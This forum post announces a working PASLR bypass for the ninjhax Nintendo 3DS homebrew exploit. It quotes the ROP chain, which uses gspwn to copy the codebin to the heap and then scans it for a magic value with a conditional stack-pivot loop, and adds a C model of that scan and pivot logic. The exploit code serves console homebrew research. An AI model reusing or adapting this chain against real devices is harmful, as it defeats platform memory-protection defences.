Smealum got PASLR bypass ROP working
@smealum
FYI the bypass for physical space randomization in ninjhax works:
https://github.com/smealum/ninjhax2....it.s#L225-L256 not sure when I'll have time to do second part
Code:
; copy codebin data to linear heap so CPU can search through it
gspwn CN_RANDCODEBIN_COPY_BASE, CN_RANDCODEBIN_BASE, CN_CODEBIN_SIZE
sleep 200*1000*1000, 0x00000000

; initialize loop variables
str_val CN_SCANLOOP_CURPTR, CN_RANDCODEBIN_COPY_BASE - CN_SCANLOOP_STRIDE

; for(u32* ptr = CN_RANDCODEBIN_COPY_BASE; *ptr != magic_value; ptr += CN_SCANLOOP_STRIDE/4);
scan_loop:
    ; increment ptr
    ldr_add_r0 CN_SCANLOOP_CURPTR, CN_SCANLOOP_STRIDE
    str_r0 CN_SCANLOOP_CURPTR

    ; compare *ptr to magic_value
    cmp_derefptr_r0addr CN_SCANLOOP_MAGICVAL, (scan_loop_pivot_after - scan_loop_pivot - 1)

    ; if conditional call above returns true, we overwrite scan_loop_pivot_offset with 8 (enough to skip real pivot), and 0 otherwise
    ; that way we exit the loop conditionally
    .word ROP_CN_POP_R4PC
        .word 0x00000001 ; r4 (we do + 1 so that 0xFFFFFFFF becomes 0)
    .word ROP_CN_ADD_R0R4_POP_R4PC
        .word 0xDEADBABE ; r4 (garbage)
    str_r0 CN_SECONDARYROP_DST + scan_loop_pivot_offset

    ; this pivot is initially unconditional but we overwrite the offset using conditional value to skip second pivot when we're done
    .word ROP_CN_POP_R3_ADD_SPR3_POP_PC
    scan_loop_pivot_offset:
        .word 0x00000000

    ; this pivot is unconditional always, it just happens to get skipped at the end
    scan_loop_pivot:
        jump_sp scan_loop
    scan_loop_pivot_after:
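To make the chain above easier to read, here is an added C model of what it computes; this is my own illustration, not code from smealum or the ninjhax2 repository. It implements the for-loop from the chain's own comment (a stride-wise scan of a copied buffer for a magic word) and the "+1 so that 0xFFFFFFFF becomes 0" step that turns the compare result into the number of bytes the final pivot skips. The stride and magic constants are placeholders for CN_SCANLOOP_STRIDE and CN_SCANLOOP_MAGICVAL (the real values are in the repository, not here), and my reading that the compare macro leaves r0 = (scan_loop_pivot_after - scan_loop_pivot - 1) on a match and 0xFFFFFFFF otherwise is an assumption. One caveat the model makes explicit: the ROP loop has no upper bound, so if the magic word is absent it keeps reading past the end of the copy; the C version stops at `len`.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Placeholder constants standing in for CN_SCANLOOP_STRIDE and
 * CN_SCANLOOP_MAGICVAL; the real values live in the ninjhax2 sources. */
#define SCAN_STRIDE_BYTES 16u
#define SCAN_MAGIC        0xCAFEBABEu

/* Bounded version of the loop in the chain's comment:
 *   for(u32* ptr = base; *ptr != magic; ptr += stride/4);
 * Returns the byte offset of the first stride-aligned word equal to `magic`,
 * or -1 if none is found within `len` bytes. The ROP loop has no such bound. */
long scan_for_magic(const uint8_t *base, size_t len, uint32_t stride, uint32_t magic)
{
    if (stride < 4 || (stride % 4) != 0) return -1;   /* stride must cover whole words */
    for (size_t off = 0; off + 4 <= len; off += stride) {
        uint32_t word;
        memcpy(&word, base + off, sizeof word);      /* alignment-safe 32-bit read */
        if (word == magic) return (long)off;
    }
    return -1;
}

/* Mirror of the "+1" step: the compare result becomes the byte count the
 * pivot skips. Assumed semantics: 0xFFFFFFFF (no match) -> 0 (keep looping),
 * (scan_loop_pivot_after - scan_loop_pivot - 1) (match) -> size of the
 * jump_sp pivot, i.e. 8 in the chain above, so the loop exits. */
uint32_t pivot_skip_bytes(uint32_t cmp_result)
{
    return cmp_result + 1u;   /* unsigned wraparound does the 0xFFFFFFFF -> 0 trick */
}

/* Constructed sample buffer: 64 bytes of filler with the magic word placed at
 * byte offset 48, which is a multiple of SCAN_STRIDE_BYTES. */
static uint8_t sample[64];

static void build_sample(void)
{
    for (size_t i = 0; i < sizeof sample; i++) sample[i] = (uint8_t)i;
    uint32_t m = SCAN_MAGIC;
    memcpy(sample + 48, &m, sizeof m);
}

/* Runs the scan over the constructed buffer; returns 48 for the sample above. */
long demo_scan(void)
{
    build_sample();
    return scan_for_magic(sample, sizeof sample, SCAN_STRIDE_BYTES, SCAN_MAGIC);
}

int main(void)
{
    printf("magic found at byte offset %ld\n", demo_scan());
    printf("pivot skip on miss: %u bytes, on hit: %u bytes\n",
           pivot_skip_bytes(0xFFFFFFFFu), pivot_skip_bytes(7u));
    return 0;
}
```

Running it prints the offset 48 and the two skip values 0 and 8, which is the whole control-flow trick of the chain: the same unconditional stack pivot is executed every iteration, and only the distance it pivots by changes.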